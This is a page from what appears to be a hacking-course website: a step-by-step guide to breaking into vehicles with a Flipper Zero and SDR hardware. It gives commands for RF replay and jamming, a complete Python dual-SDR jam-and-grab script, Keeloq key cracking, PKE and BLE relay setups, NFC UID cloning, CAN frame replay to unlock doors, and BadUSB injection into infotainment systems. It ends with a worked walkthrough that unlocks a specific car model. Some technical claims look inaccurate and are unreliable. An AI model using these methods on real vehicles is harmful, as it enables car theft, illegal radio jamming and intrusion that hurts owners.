top of page

Hacking Vehicles With The Flipper Zero (Guide)

Hacking Vehicles With The Flipper Zero (Guide) | Black Hat HQ

Hacking Vehicles With The Flipper Zero


Let's go deep on the full vehicle pentest with Flipper Zero as your primary tool. I'll cover every practical attack surface, hardware add-ons, and the toolchain you need. This is a guide on hacking vehicles with the Flipper Zero.


Hardware Loadout


The stock Flipper is a starting point. You need add-ons for real vehicle work:


Component

Purpose

Cost

Flipper Zero

Core platform

~$170

CC1101 + amplifier module

Extended Sub-GHz range (500m+)

~$15-25

Nook/NRF24 board

Mouse jacking, BLE extended range

~$20

ESP32 WiFi devboard

WiFi attacks, remote control of Flipper

~$15

External 125 kHz LF antenna

PKE relay, LF challenge transmission

~$30-50

Logic analyzer (cheap FX2LP)

CAN bus sniffing through OBD-II

~$10

RTL-SDR or HackRF

Full-spectrum capture/analysis, simultaneous TX/RX

~$30-300

External battery pack

Long-duration attacks (jam-and-wait)

~$15


Firmware: Flash Unleashed First


bash

# Stock firmware is intentionally gimped for legal reasons
# Unleashed removes the frequency transmission lock and adds protocols

git clone https://github.com/DarkFlippers/unleashed-firmware
cd unleashed-firmware
./fbt updater_package
# Install via qFlipper: File → Install from file → select the .tgz

Unleashed adds: full frequency TX, Keeloq brute-force helpers, TPMS app, Sub-GHz bruteforcer, Weather Station (for RF noise analysis), and the spectrum analyzer improvements.

If you need the most aggressive feature set, RogueMaster adds rolling code brute-force against specific protocols, but Unleashed is the standard for vehicle work.


Phase 1: Frequency Reconnaissance


Determine the Vehicle's RF Profile


Different manufacturers, different frequencies, different protocols:


bash

# Flipper workflow:
# Sub-GHz → Frequency Analyzer
# Hold near driver's door handle
# Have owner press fob multiple times
# Note every frequency spike

# Common frequency mapping:
# 315 MHz:   US/Japan/Asia — GM, Ford, Chrysler, Toyota, Honda, Nissan
# 433.92 MHz: EU/Australia/South America — VW Group, BMW, Mercedes, Fiat
# 868 MHz:   EU newer systems, some Land Rover, Volvo
# 125 kHz:   PKE challenge (LF) — nearly universal for keyless entry
# 13.56 MHz: NFC key cards — Tesla, some BMW, Genesis
# 2.4 GHz:   BLE — Tesla phone key, BMW Digital Key Plus, Apple CarKey

Multi-Frequency Capture


The fob might transmit on multiple frequencies simultaneously or in sequence:


bash

# Method: Scripted sweep
# Use a HackRF or connect Flipper to a computer for SDR control:

# With RTL-SDR + Universal Radio Hacker:
git clone https://github.com/jopohl/urh
cd urh
python3 -m urh.main
# Set frequency range: 300-450 MHz sweep
# Press fob — see exact frequency, modulation, and symbol rate

# With Flipper + external CC1101:
# The external module can be set to any frequency via GPIO
# Stock Flipper limits frequency hopping speed

Phase 2: Protocol Identification


Capture Raw Signals


bash

# Flipper: Sub-GHz → Read
# Config: AM650 (ASK/OOK for most cars), or AM270 (wider bandwidth)
# Press fob once → capture
# Press fob again → capture second signal
# Save both as .sub files

# Compare the two captures:
# Flipper → Sub-GHz → Saved → select first capture → Info
# Compare to second capture
# If identical → fixed code (replay wins)
# If different → rolling code (need jam-and-grab or brute-force)

Pulse Plot Analysis


bash

# On-device: Sub-GHz → Read → press and hold fob → observe waveform
# Look for:
# - Repeating pattern? Fixed code or simple rolling
# - Preamble length
# - Sync word
# - Data payload length (in bits)
# - Any visible counter increment

# Export for deep analysis:
# qFlipper → File Manager → SD Card → subghz/
# Copy .sub files to computer
# Open in Universal Radio Hacker or inspect hex manually

Identify the Protocol from Capture


Flipper will auto-detect protocols it knows. For unknown protocols, match these characteristics:


Protocol

Typical Bit Length

Modulation

Notes

Keeloq

66 bits

ASK/OOK, PWM

32-bit serial + 34-bit encrypted payload

Keeloq Hopping

66 bits

ASK/OOK

Uses KeeLoq Decryptor chips (HCS200/300/500)

Security+ 1.0

40 bits

ASK/OOK

Old GM/Chrysler, fixed code

Security+ 2.0

Rolling

ASK/OOK

GM post-2007, crypto rolling

Princeton

24 bits

ASK/OOK

Some aftermarket alarms

CAME / Nice FLO

24-72 bits

ASK/OOK

European alarm systems, some older EU cars

Ford 80-bit

80 bits

ASK/OOK

Ford post-2010

Toyota DST-40

40 bits

ASK/OOK

Older Toyota/Lexus


Phase 3: The Attack Matrix


Attack A: Direct Replay (Fixed Code Systems)


bash

# Capture once, replay instantly.
# Sub-GHz → Read → capture fob press → Save
# Sub-GHz → Saved → select file → Send

# Range boost with external CC1101:
# Wire CC1101 module to Flipper GPIO:
# VCC → 3.3V (pin 1)
# GND → GND (pin 8)
# MOSI → pin 4 (MOSI)
# MISO → pin 5 (MISO)
# SCK → pin 6 (SCK)
# CSN → pin 2 (PA4)
# Use Unleashed firmware's external radio app

The range becomes significant — 500m+ with an amplified module.


Attack B: Jam-and-Grab (Rolling Code)


This requires two devices working simultaneously. The Flipper is half-duplex and cannot TX/RX at the same time.


Dual Flipper Setup:


bash

# Flipper A: Continuous Jammer
# Sub-GHz → Read → select any saved file at same frequency
# Modify .sub file to extend duration
# Or use Power Analyzer app to generate sustained carrier wave
# CC1101 external module set to constant TX at carrier frequency

# Flipper B: Capture
# Sub-GHz → Read → same frequency
# Captures the fob's second button press while Flipper A is jamming

# Result: Flipper B has a valid code. Flipper A stops jamming.
# Flipper B: Send the captured code → car unlocks

Flipper + SDR Setup (higher success rate):


bash

# HackRF / LimeSDR: Continuous wave transmission at fob frequency
hackrf_transfer -f 315000000 -x 40 -t jammer.iq  # 315 MHz, full power

# Simultaneously: Flipper in Read mode captures clean fob signal
# HackRF can capture too:
hackrf_transfer -f 315000000 -r capture.iq -s 2000000

# After capture, stop jamming, replay:
hackrf_transfer -f 315000000 -t captured_signal.iq -x 40

Python automation with two SDRs:


python

#!/usr/bin/env python3
"""
Dual-SDR Jam-and-Grab for rolling code vehicle entry
Requires: Two HackRFs or one HackRF + one RTL-SDR
"""
import subprocess
import time
import signal
import sys
import os

FREQ = 315_000_000  # Adjust to target
SAMPLE_RATE = 2_000_000
CAPTURE_FILE = "/tmp/car_signal.iq"
running = True

def signal_handler(sig, frame):
    global running
    running = False
    print("\n[!] Stopping...")

signal.signal(signal.SIGINT, signal_handler)

def start_jammer():
    """Transmit CW jammer on target frequency"""
    print("[+] Starting jammer (continuous wave)...")
    return subprocess.Popen([
        "hackrf_transfer",
        "-f", str(FREQ),
        "-x", "40",           # Full power
        "-a", "1",            # Amp enabled
        "-t", "/dev/zero",    # CW = all zeros
        "-s", str(SAMPLE_RATE)
    ])

def start_capture():
    """Capture incoming fob signal during jam"""
    print("[+] Starting capture...")
    proc = subprocess.Popen([
        "hackrf_transfer",
        "-f", str(FREQ),
        "-r", CAPTURE_FILE,
        "-s", str(SAMPLE_RATE),
        "-n", str(SAMPLE_RATE * 10)  # 10 seconds
    ])
    proc.wait()
    return CAPTURE_FILE

def replay_capture():
    """Replay captured valid code"""
    print("[+] Replaying captured code...")
    for _ in range(3):
        subprocess.run([
            "hackrf_transfer",
            "-f", str(FREQ),
            "-t", CAPTURE_FILE,
            "-x", "40",
            "-a", "1",
            "-R"  # Repeat
        ], timeout=2)
    print("[+] Replay complete")

def main():
    jammer = start_jammer()
    time.sleep(2)  # Let jammer stabilize
    
    print("[*] Jammer active. Waiting for target to press fob...")
    print("[*] Press Ctrl+C when signal is captured")
    
    capture_file = start_capture()
    
    jammer.kill()
    jammer.wait()
    print("[+] Jammer stopped")
    
    # Analyze capture size
    size = os.path.getsize(capture_file)
    print(f"[+] Captured {size} bytes")
    
    if size > 1000:  # Actual signal captured, not just noise
        choice = input("[?] Replay captured code? (y/n): ")
        if choice.lower() == 'y':
            replay_capture()
    
    print("[+] Done")

if __name__ == "__main__":
    main()

Attack C: Keeloq Brute-Force (Pre-2008 Vehicles)


Keeloq uses a 64-bit key. Full brute force is infeasible. But:

Known-key databases: Some manufacturers used fixed OEM keys that have been extracted from firmware updates, dealer tools, or ECU dumps.


bash

# Unleashed firmware Keeloq tools:
# Sub-GHz → Keeloq → select manufacturer
# Pulls from a database of known manufacturer codes

# Common known-key vehicles:
# - Fiat, some Alfa Romeo (pre-2012)
# - Older Chrysler/Dodge/Jeep (pre-2008)
# - Some European aftermarket systems using HCS301

# Flipper workflow:
# Sub-GHz → Read → capture the car's transmission (any button)
# Then: Apps → Sub-GHz → Keeloq Cracker
# Select target manufacturer
# Flipper tries known key database against captured serial number

Serial number extraction: The Keeloq transmission includes the encoder's serial number in plaintext. This narrows the keysearch to that specific encoder's manufacturer batch.

The Flipper alone won't do a full Keeloq cryptanalysis. For that, offload to a computer:


bash

# Capture multiple transmissions with Flipper
# Export .sub files via qFlipper

# On computer:
git clone https://github.com/n0xa/keeloq-crack
cd keeloq-crack
# Feed captured data, attempt to derive encryption key
# Works against specific vulnerable Keeloq implementations (HCS200/300)

Attack D: PKE Relay Attack (Keyless Entry)


Passive Keyless Entry uses LF challenge (125 kHz) + UHF response (315/433 MHz). The car polls at ~125 kHz, the key responds on UHF when within ~1-2 meters.


The full relay requires LF TX capability:


bash

# Flipper + External LF driver board:
# Connect LF antenna + driver to Flipper GPIO
# LF board picks up car's 125 kHz challenge near the car
# Transmits it via Flipper's GPIO → Sub-GHz to second Flipper near the key

# Second Flipper near the key:
# Receives the relayed challenge
# LF board emits 125 kHz challenge near the key
# Key responds on UHF (315/433 MHz)
# Flipper captures UHF response
# Relays UHF back to first Flipper near car
# First Flipper replays UHF response at car
# Car unlocks, thinking key is nearby

Flipper 125 kHz board sources:


  • Tindie/eBay: "Flipper Zero LF RFID Expansion" — these add 125 kHz TX

  • The stock Flipper has 125 kHz read on GPIO (for RFID tags), but needs an amplifier to transmit at the power needed for PKE challenge reproduction

  • The AWID board or custom builds using an LR-ASK transmitter IC


Distance matters: The LF challenge only reaches ~1-2 meters. You need an attacker within 2 meters of the key fob. This is the dining-table attack — someone near the car, someone near the owner's bag/jacket.


Attack E: NFC Key Card (Tesla, BMW, Genesis)


Tesla Model 3/Y Key Card:


The Tesla key card is MIFARE DESFire EV2 on newer models. Flipper reads the UID but can't extract application keys.


However:


Shadow Key Card technique (if you have brief physical access):


bash

# Flipper → NFC → Read
# Card type: MIFARE DESFire
# UID: captured (unencrypted)
# Application keys: not extractable

# But if the Tesla owner leaves the card momentarily:
# 1. Read UID with Flipper
# 2. The UID is part of Tesla's unlock decision (legacy behavior)
# 3. Some older Tesla firmware accepted UID-only for unlock if
#    the card was previously paired

# Test: Flipper → NFC → Add Manually → MIFARE Classic
# Set UID to match the Tesla card
# Hold to B-pillar
# This works on specific firmware versions — test and document

Genesis/BMW NFC key cards:


Similar story. MIFARE DESFire or FeliCa. UID read is possible, but application key extraction requires either:


  • Cracking tools (mfkey32 for MIFARE Classic vulnerabilities, not applicable to DESFire)

  • Side-channel analysis (not practical with Flipper)

  • Genuine card present for relay


Attack F: BLE Phone-as-Key (Tesla, BMW Digital Key)


Tesla BLE Unlock:


Tesla uses BLE for phone-as-key. The phone broadcasts a specific BLE advertisement, the car recognizes it and unlocks.


Flipper BLE recon:


bash

# Flipper → Apps → Bluetooth → BLE Spam
# Select Tesla
# This floods with Tesla unlock advertisements
# Nearby Teslas will show unlock attempt notifications
# This is NOT a real unlock — it's a UI pop-up
# Use for: testing owner's response, desensitization testing,
#          or confirming Tesla presence in the area

# For actual relay attack:
# Two Flippers with ESP32 WiFi boards
# Flipper A near car: scans for car BLE advertisements
# Flipper B near phone: relays phone BLE advertisements to Flipper A
# Flipper A replays phone advertisements near car
# This is the relay concept — requires custom code on both Flippers

Practical BLE relay with Flipper + ESP32:


python

# ESP32 #1 (near car): BLE scanner
# Detects Tesla BLE advertisement from car
# Sends advertisement data over WiFi to ESP32 #2

# ESP32 #2 (near phone): BLE advertiser
# Replicates car's BLE advertisement to trigger phone response
# Captures phone's BLE response
# Sends back over WiFi to ESP32 #1

# ESP32 #1: replays phone's BLE response to car
# Car unlocks

# Flippers act as the control interface for ESP32s
# GPIO UART connection to ESP32 devboards
# Or use Flipper's built-in ESP32 WiFi board

This is a non-trivial custom build. It's been demonstrated successfully at multiple conferences against Tesla (2023-2025). The distance limitation is practical: both relays must be within BLE range of their respective targets (~10 meters max without directional antennas).


Phase 4: OBD-II Post-Entry


Once the vehicle is open, the OBD-II port is your pivot into the CAN bus:


bash

# Connect Flipper to OBD-II via GPIO
# Requires CAN bus transceiver (MCP2515 or SN65HVD230)
# Wiring:
# OBD-II Pin 6: CAN High → transceiver → Flipper GPIO
# OBD-II Pin 14: CAN Low → transceiver → Flipper GPIO
# OBD-II Pin 16: +12V power → voltage regulator → Flipper USB-C or GPIO

# Flipper firmware: Apps → GPIO → CAN Bus
# Unleashed includes CAN sniffer
# Capture CAN frames during:
# - Unlock event
# - Engine start
# - Infotainment interaction
# - Telematics data

# Save the CAN log to SD card
# Export via qFlipper for analysis

Combined with a laptop and SavvyCAN/Wireshark after capture, you can analyze:


  • CAN arbitration IDs for each vehicle function

  • Whether diagnostic security (SecurityAccess) is required for write operations

  • Replay certain CAN frames (e.g., unlock doors, disable alarm) if the bus is insufficiently authenticated


Phase 5: Infotainment Pivoting


bash

# Flipper as USB Rubber Ducky into infotainment USB port
# Many infotainment systems are Linux or QNX under the hood
# A badusb-style attack tests whether the USB port allows HID input

# Flipper → BadUSB → select payload
# Payload tests:
# - ADB over USB (Android Automotive)
# - Keyboard injection (QNX console access)
# - Mass storage with autorun (older systems)

# Flipper as Bluetooth keyboard:
# Apps → Bluetooth → HID Keyboard
# Pair to infotainment (if discoverable)
# Inject keystrokes to:
# - Access engineering menu
# - Search hidden settings for "adb" or "developer"
# - Test browser for SSRF to internal vehicle services

Attack Chain: Full Engagement Walkthrough


Vehicle: 2016 Toyota Camry with keyless entry (push-button start), US market

bash

# STEP 1: Recon
Flipper → Sub-GHz → Frequency Analyzer
# Hold near door. Owner presses unlock.
# Result: 315.0 MHz spike confirmed

# STEP 2: Protocol identification
Flipper → Sub-GHz → Read → AM650 → 315 MHz
# Owner presses unlock
# Flipper identifies: Security+ or Keeloq variant
# Save capture

# STEP 3: Rolling code check
# Capture second press
# Compare: different waveform = rolling code confirmed

# STEP 4: Jam-and-grab
# Flipper A + external CC1101 amp: constant 315 MHz jam
# Flipper B: Read at 315 MHz
# Owner presses fob twice (first jammed, second captured)
# Stop jammer
# Flipper B: Send captured code
# RESULT: Door unlocks on first replay

# STEP 5: Document
# Save .sub files as evidence
# Photo of Flipper with unlocked door indicator
# Record: vehicle year/make/model, frequency, protocol, attack method

# STEP 6: Post-entry
# Check for physical keyhole cover removal (emergency blade)
# OBD-II port: accessible without tools? Security gateway present?
# Infotainment: USB port accessible, Bluetooth in pairing mode?
# Glovebox: service records with key code card?
# Document all findings

What Definitely Won't Work


Don't waste time on:


  • Modern Toyota/Lexus (2018+): AES-128 encrypted rolling codes with per-car unique keys. Replay/jam-and-grab fails.

  • VW Group (2015+): Fifth-generation immobilizer. Cryptographic challenge-response with car-specific keys burned into the BCM.

  • Any Tesla before physical access: Tesla's encryption is solid. The relay attack is the only practical path and requires two-person hardware.

  • Starting the engine on push-button start vehicles: The immobilizer is separate from the door locks. Unlocking the door doesn't enable cranking.

  • Sub-GHz brute-force on any modern system: The keyspace is 2^32 minimum, 2^128 typical. Flipper's CC1101 transmits at ~50-100 packets/second. Math says no.


Documentation for the Report


For each vehicle tested, record:


markdown

## Vehicle: [Year] [Make] [Model]
- VIN: [if authorized]
- Key type: [Fob / PKE / NFC / BLE]
- Frequency: [315 / 433.92 / 868] MHz
- Protocol: [Keeloq / Security+ / DST / etc.]
- Fixed or rolling: [Fixed / Rolling]
- Attack attempted: [Replay / Jam-and-grab / Relay]
- Result: [Success / Failure]
- CVSS: [Score] — [Reasoning]
- Remediation: [Shielded key pouch, Faraday box, PIN-to-drive,
               aftermarket immobilizer, updated BCM firmware]

Enroll In Online Cybersecurity & Hacking Classes/Courses | Black Hat HQ

Comments


Master the Art!

Info

715-527-1928

www.blackhathq.com

Address

P.O. Box 126
Antigo, Wisconsin 54409

The skills/techniques/guides on this site are not for illegal/illicit use and are not condoned by
Black Hat HQ!

Best Value

Elite Hacker

$100

100

Every month

Get Access To All The Courses For A Monthly Fee

Valid until canceled

Get complete access to all courses with Elite Hacker!

Get full access to exclusive online Groups/Forums!

Best Value

Neophyte

$50

50

Every month

Get Access To All Courses $10 Or Less!

Valid until canceled

Get access to all courses $10 or under!

Get exclusive access to specific forums/groups!

Choose your pricing plan

Find one that works for you

© 2026 Black Hat HQ

bottom of page